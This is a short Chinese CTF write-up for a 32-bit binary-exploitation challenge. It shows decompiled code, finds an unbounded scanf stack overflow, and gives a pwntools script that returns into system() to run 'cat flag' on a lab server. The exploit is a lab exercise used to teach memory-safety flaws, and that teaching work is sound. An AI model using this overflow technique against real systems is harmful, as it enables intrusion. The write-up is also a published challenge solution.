# 1. 查看程序
ida32 查看
main 函数:
int __cdecl main(int argc, const char **argv, const char **envp) | |
{ | |
unsigned int v3; // eax | |
char s2[11]; // [esp+1Dh] [ebp-13h] BYREF | |
int v6; // [esp+28h] [ebp-8h] | |
int i; // [esp+2Ch] [ebp-4h] | |
v6 = 10; | |
puts("\n\n\n------Test Your Memory!-------\n"); | |
v3 = time(0); | |
srand(v3); | |
for ( i = 0; i < v6; ++i ) | |
s2[i] = alphanum_2626[rand() % 0x3Eu]; | |
printf("%s", s2); | |
mem_test(s2); | |
return 0; | |
} |
mem_test (s2) 函数:
int __cdecl mem_test(char *s2) | |
{ | |
int result; // eax | |
char s[19]; // [esp+15h] [ebp-13h] BYREF | |
memset(s, 0, 0xBu); | |
puts("\nwhat???? : "); | |
printf("0x%x \n", hint); | |
puts("cff flag go go go ...\n"); | |
printf("> "); | |
__isoc99_scanf("%s", s); | |
if ( !strncmp(s, s2, 4u) ) | |
result = puts("good job!!\n"); | |
else | |
result = puts("cff flag is failed!!\n"); | |
return result; | |
} |
发现有个 scanf 函数,这里没有限制读取可以栈溢出
程序有 system 函数,并且也有 cat flag
字符串
通过溢出返回执行 system (cat flag) 即可,这里为了程序能够正常执行 cat flag 需要返回 system 地址为 main,因为比较的函数在后面不会影响我们的执行
from pwn import * | |
from LibcSearcher import * | |
#context.log_level = 'debug' | |
context(os='linux', arch='i386', log_level='debug') | |
#p=process('./memory') | |
#e=ELF('./') | |
p=remote('node4.buuoj.cn',27943) | |
#shellcode = asm(shellcraft.sh()) | |
flag=0x80487E0 | |
system=0x8048440 | |
main=0x8048677 | |
payload1=b"a"*23+p32(system)+p32(main)+p32(flag) | |
p.sendline(payload1) | |
p.interactive() |